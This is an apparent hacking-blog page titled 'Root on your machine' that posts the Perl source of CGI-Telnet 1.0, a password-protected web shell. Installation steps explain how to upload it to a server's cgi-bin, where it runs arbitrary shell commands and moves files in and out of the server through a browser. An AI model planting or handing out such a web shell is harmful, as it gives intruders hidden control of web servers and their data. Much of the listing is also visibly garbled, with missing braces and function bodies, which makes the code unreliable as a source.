[PERL && CGI] Root on your machine | Rooter sa machine [PERL && CGI] Root on your machine | Rooter sa machine | Scripts | Codes

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Faire des trucs en root...
Suivre les étapes décrites dans le fichier

Do stuff as root...
Follow the steps described in the file.

إفعل أشعل كروت 

إتبع الخطوات المذكورة في السكريبت 

Open in a new window
# find more scripts on scripts-n-codes.blogspot.com
# Copyright and Licence
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
# Copyright (C) 2001 Rohitab Batra
# Permission is granted to use, distribute and modify this script so long
# as this copyright notice is left intact. If you make changes to the script
# please document them and inform me. If you would like any changes to be made
# in this script, you can e-mail me.
# Author: Rohitab Batra
# Author e-mail: rohitab@rohitab.com
# Author Homepage: http://www.rohitab.com/
# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
# Product Support: http://www.rohitab.com/support/
# Discussion Forum: http://www.rohitab.com/discuss/
# Mailing List: http://www.rohitab.com/mlist/

# Installation
# To install this script
# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
#    your server. For most servers, you may not need to modify this.
# 2. Change the password in the Configuration section below.
# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
#    Configuration Section below.
# 4. Upload the script to a directory on your server which has permissions to
#    execute CGI scripts. This is usually cgi-bin. Make sure that you upload
#    the script in ASCII mode.
# 5. Change the permission (CHMOD) of the script to 755.
# 6. Open the script in your web browser. If you uploaded the script in
#    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
# 7. Login using the password that you specified in Step 2.

# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
$Password = "changeme";  # Change this. You will need to enter this
    # to login.

$WinNT = 0;   # You need to change the value of this to 1 if
    # you're running this script on a Windows NT
    # machine. If you're running it on Unix, you
    # can leave the value as it is.

$NTCmdSep = "&";  # This character is used to seperate 2 commands
    # in a command line on Windows NT.

$UnixCmdSep = ";";  # This character is used to seperate 2 commands
    # in a command line on Unix.

$CommandTimeoutDuration = 10; # Time in seconds after commands will be killed
    # Don't set this to a very large value. This is
    # useful for commands that may hang or that
    # take very long to execute, like "find /".
    # This is valid only on Unix servers. It is
    # ignored on NT Servers.

$ShowDynamicOutput = 1;  # If this is 1, then data is sent to the
    # browser as soon as it is output, otherwise
    # it is buffered and send when the command
    # completes. This is useful for commands like
    # ping, so that you can see the output as it
    # is being generated.


$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");

# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
sub ReadParse 
 local (*in) = @_ if @_;
 local ($i, $loc, $key, $val);
 $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;

  $in = $ENV{'QUERY_STRING'};
 elsif($ENV{'REQUEST_METHOD'} eq "POST")
  binmode(STDIN) if $MultipartFormData & $WinNT;
  read(STDIN, $in, $ENV{'CONTENT_LENGTH'});

 # handle file upload data
 if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  $Boundary = '--'.$1; # please refer to RFC1867 
  @list = split(/$Boundary/, $in); 
  $HeaderBody = $list[1];
  $HeaderBody =~ /\r\n\r\n|\n\n/;
  $Header = $`;
  $Body = $';
   $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  $in{'filedata'} = $Body;
  $Header =~ /filename=\"(.+)\"/; 
  $in{'f'} = $1; 
  $in{'f'} =~ s/\"//g;
  $in{'f'} =~ s/\s//g;

  # parse trailer
  for($i=2; $list[$i]; $i++)
   $list[$i] =~ s/^.+name=$//;
   $list[$i] =~ /\"(\w+)\"/;
   $key = $1;
   $val = $';
   $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
   $val =~ s/%(..)/pack("c", hex($1))/ge;
   $in{$key} = $val; 
 else # standard post data (url encoded, not multipart)
  @in = split(/&/, $in);
  foreach $i (0 .. $#in)
   $in[$i] =~ s/\+/ /g;
   ($key, $val) = split(/=/, $in[$i], 2);
   $key =~ s/%(..)/pack("c", hex($1))/ge;
   $val =~ s/%(..)/pack("c", hex($1))/ge;
   $in{$key} .= "\0" if (defined($in{$key}));
   $in{$key} .= $val;

# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
sub PrintPageHeader
 $EncodedCurrentDir = $CurrentDir;
 $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
 print "Content-type: text/html\n\n";
 print <<END;
<title>CGI-Telnet Version 1.0</title>
<body  bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
<b><font color="#000080" size="2">#</font></b></td>
<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to $ServerName</b></font></td>
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> | 
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
<a href="$ScriptLocation?a=logout">Disconnect</a> |
<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
<font color="#C0C0C0" size="3">

# Prints the Login Screen
sub PrintLoginScreen
 $Message = q$<pre><font color="#669999"> _____  _____  _____          _____        _               _
/  __ \|  __ \|_   _|        |_   _|      | |             | |
| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
 \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
</font><font color="#FF0000">                      ______             </font><font color="#AE8300">© 2001, Rohitab Batra</font><font color="#FF0000">
                   .-"      "-.
                  /            \
                 |              |
                 |,  .-.  .-.  ,|
                 | )(_o/  \o_)( |
                 |/     /\     \|
       (@_       (_     ^^     _)
  _     ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font color="#FF0000">/</font><font color="#808080">_______________________
</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font color="#808080"><________</font><font color="#FF0000">|-\IIIIII/-|</font><font color="#808080">________________________></font><font color="#FF0000">
        )_/        \          / 
       (@           `--------`
             </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
 print <<END;
Trying $ServerName...<br>
Connected to $ServerName<br>
Escape character is ^]

# Prints the message that informs the user of a failed login
sub PrintLoginFailedMessage
 print <<END;
<br>login: admin<br>
Login incorrect<br><br>

# Prints the HTML form for logging in
sub PrintLoginForm
 print <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
login: admin<br>
password:<input type="password" name="p">
<input type="submit" value="Enter">

# Prints the footer for the HTML Page
sub PrintPageFooter
 print "</font></body></html>";

# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
sub GetCookies
 @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
 foreach $cookie(@httpcookies)
  ($id, $val) = split(/=/, $cookie);
  $Cookies{$id} = $val;

# Prints the screen when the user logs out
sub PrintLogoutScreen
 print "<code>Connection closed by foreign host.<br><br></code>";

# Logs out the user and allows the user to login again
sub PerformLogout
 print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie

# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
sub PerformLogin 
 if($LoginPassword eq $Password) # password matched
  print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
 else # password didn't match
  if($LoginPassword ne "") # some password was entered

# Prints the HTML form that allows the user to enter commands
sub PrintCommandLineInputForm
 $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
 print <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
<input type="text" name="c">
<input type="submit" value="Enter">

# Prints the HTML form that allows the user to download files
sub PrintFileDownloadForm
 $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
 print <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">

# Prints the HTML form that allows the user to upload files
sub PrintFileUploadForm
 $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
 print <<END;
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options:  <input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:   <input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">

# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
sub CommandTimeout
  print <<END;
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!

# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
sub ExecuteCommand
 if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  # we change the directory internally. The output of the
  # command is not displayed.
  $OldDir = $CurrentDir;
  $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  chop($CurrentDir = `$Command`);
  $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
  print "<code>$Prompt $RunCommand</code>";
 else # some other command, display the output
  $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  print "<code>$Prompt $RunCommand</code><xmp>";
  $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
   $SIG{'ALRM'} = \&CommandTimeout;
  if($ShowDynamicOutput) # show output as it is generated
   $Command .= " |";
   open(CommandOutput, $Command);
    $_ =~ s/(\n|\r\n)$//;
    print "$_\n";
  else # show output after command completes
   print `$Command`;
  print "</xmp>";

# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
sub PrintDownloadLinkPage
 local($FileUrl) = @_;
 if(-e $FileUrl) # if the file exists
  # encode the file link so we can send it to the browser
  $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  print <<END;
Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
 else # file doesn't exist
  print "<code>Failed to download $FileUrl: $!</code>";

# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
sub SendFileToBrowser
 local($SendFile) = @_;
 if(open(SENDFILE, $SendFile)) # file opened for reading
  $FileSize = (stat($SendFile))[7];
  ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
  print "Content-Type: application/x-unknown\n";
  print "Content-Length: $FileSize\n";
  print "Content-Disposition: attachment; filename=$1\n\n";
  print while(<SENDFILE>);
 else # failed to open file
  print "<code>Failed to download $SendFile: $!</code>";

# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
sub BeginDownload
 # get fully qualified path of the file to be downloaded
 if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  $TargetFile = $TransferFile;
 else # path is relative
  chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  $TargetFile .= $PathSep.$TransferFile;

 if($Options eq "go") # we have to send the file
 else # we have to send only the link page

# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
sub UploadFile
 # if no file is specified, print the upload form again
 if($TransferFile eq "")

 # start the uploading process
 print "<code>Uploading $TransferFile to $CurrentDir...<br>";

 # get the fullly qualified pathname of the file to be created
 chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
 $TransferFile =~ m!([^/^\\]*)$!;
 $TargetName .= $PathSep.$1;

 $TargetFileSize = length($in{'filedata'});
 # if the file exists and we are not supposed to overwrite it
 if(-e $TargetName && $Options ne "overwrite")
  print "Failed: Destination file already exists.<br>";
 else # file is not present
  if(open(UPLOADFILE, ">$TargetName"))
   binmode(UPLOADFILE) if $WinNT;
   print UPLOADFILE $in{'filedata'};
   print "Transfered $TargetFileSize Bytes.<br>";
   print "File Path: $TargetName<br>";
   print "Failed: $!<br>";
 print "</code>";

# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through  which the file can be downloaded.
sub DownloadFile
 # if no file is specified, print the download form again
 if($TransferFile eq "")
 # get fully qualified path of the file to be downloaded
 if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  $TargetFile = $TransferFile;
 else # path is relative
  chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  $TargetFile .= $PathSep.$TransferFile;

 if($Options eq "go") # we have to send the file
 else # we have to send only the link page

# Main Program - Execution Starts Here

$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};

$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default

# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");

$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;

if($Action eq "login" || !$LoggedIn) # user needs/has to login
elsif($Action eq "command") # user wants to run a command
elsif($Action eq "upload") # user wants to upload a file
elsif($Action eq "download") # user wants to download a file
elsif($Action eq "logout") # user wants to logout

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